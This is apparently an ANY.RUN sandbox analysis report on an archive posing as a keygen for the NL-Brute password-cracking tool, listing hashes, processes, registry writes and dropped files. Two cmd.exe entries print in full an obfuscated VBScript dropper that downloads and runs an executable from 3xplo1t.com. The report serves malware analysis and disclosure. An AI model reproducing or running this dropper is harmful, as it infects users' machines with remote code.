File name: NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z

Full analysis: https://app.any.run/tasks/87da4e6e-8ebf-4e25-a2ce-5367add31653
Verdict: Malicious activity
Analysis date: November 20, 2018, 17:34:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5: 37398F3A62624CC800F8BD0FBDE14864
SHA1: 53FE5275EB42ED0D13E32ACEE6FC4411335984EE
SHA256: 08443ACA2D1C220360CA6409D7062995DD4C9034A90D26A19A73F670D2224E6D
SSDEEP: 196608:1+nirUSrXcsLhUP+tNLg9VR8hrPg/wnOPeZxNXYdsaysWfLBrcLvHfnrhm9:qirNXcsLtN09VRo6wnGUXYdsay/DBYvE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3360)
      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
    • Executes scripts

      • cmd.exe (PID: 2764)
      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
      • cmd.exe (PID: 2836)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3308)
      • WScript.exe (PID: 3456)
  • INFO

    No info indicators.
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
All screenshots are available in the full report
Total processes: 43
Monitored processes: 11
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Processes shown in the graph: start → winrar.exe, nlbrute 1.2 x64 & vpn.exe, wscript.exe, cmd.exe, wscript.exe, timeout.exe, nlbrute 1.2 x64.exe, wscript.exe, cmd.exe, wscript.exe, timeout.exe

Process information

Fields: PID | CMD | Path | Indicators | Parent process
PID: 1272
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe"
Path: C:\Windows\System32\WScript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules (images):
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

PID: 1464
CMD: timeout 12
Path: C:\Windows\system32\timeout.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: timeout - pauses command processing
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll

PID: 2152
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe"
Path: C:\Windows\System32\WScript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules (images):
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

PID: 2552
CMD: timeout 12
Path: C:\Windows\system32\timeout.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: timeout - pauses command processing
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll

PID: 2764
CMD: "C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXE
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

PID: 2836
CMD: "C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXE
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

PID: 3308
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js"
Path: C:\Windows\System32\WScript.exe
Parent process: NLBrute 1.2 x64.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules (images):
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

PID: 3344
CMD: "C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe"
Path: C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Modules (images):
c:\users\admin\desktop\nl-brute 1.2 x64 & 1.2 x64 vpn edition - keygen\nlbrute 1.2 x64.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll

PID: 3360
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.60.0
Modules (images):
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll

PID: 3456
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js"
Path: C:\Windows\System32\WScript.exe
Parent process: NLBrute 1.2 x64 & VPN.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules (images):
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

Total events: 2 133
Read events: 2 076
Write events: 57
Delete events: 0

Modification events

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (3360) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation: write
Name: ShowPassword
Value: 0

(PID) Process: (3492) NLBrute 1.2 x64 & VPN.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0

Executable files: 5
Suspicious files: 1
Text files: 27
Unknown types: 0

Dropped files

PID | Process | Filename | Type

3492 | NLBrute 1.2 x64 & VPN.exe | C:\Users\admin\AppData\Local\Temp\autCF85.tmp |
MD5:
SHA256:

3492 | NLBrute 1.2 x64 & VPN.exe | C:\Users\admin\AppData\Local\Temp\autDD42.tmp |
MD5:
SHA256:

3344 | NLBrute 1.2 x64.exe | C:\Users\admin\AppData\Local\Temp\autABA.tmp |
MD5:
SHA256:

3344 | NLBrute 1.2 x64.exe | C:\Users\admin\AppData\Local\Temp\aut1847.tmp |
MD5:
SHA256:

3360 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN - KeyGen\key.txt | text
MD5: E1496DB70F136597884F6D1DE550EE1B
SHA256: 36307D6A90BB74275AEBAABB0DF7E30478C685D5E40A6772D7892004A72C22DE

3360 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN - KeyGen\Thumbs.db | binary
MD5: 632F21B2FF993B86727539641895F39F
SHA256: CA2EDDBC5869056B3BF122B60DA12F2ADBBDCB31EBE8E9B6C3A99E2A311E968A

3360 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\a3e0dfcaa65540c2b2295df658e1294e.png | image
MD5: D2C7DF27E3508AC727337D45CF64D105
SHA256: 36C7B94542AE79E27F02324519467BD2850FE45B86675EBE6748D6B0D901B3CF

3360 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\settings.ini | text
MD5: BD030391DAC046B0E05A5BAB3C738EE7
SHA256: 774CFE32DCEF45CD131EC4BE8B35AB33BC0886DA95A6E3522437ADDF72E32BCE

2836 | cmd.exe | C:\Users\admin\AppData\Local\Temp\X6j.vBe | text
MD5: 2CD07081F292637FAD320E66DA1D465C
SHA256: 954391EEA5DE4C62B9E40B189FF61A12F60489DBA92F284F75B1107FC5A197DF

3360 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe | executable
MD5: EF5AF094147A15CB93E0133EF08AFB94
SHA256: 20A1B69ABA93767FCAC326842B8A532B4A83A08FCCFE320387584A778A6CB574
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: 3xplo1t.com
IP:
Reputation: unknown

Threats

No threats detected
No debug info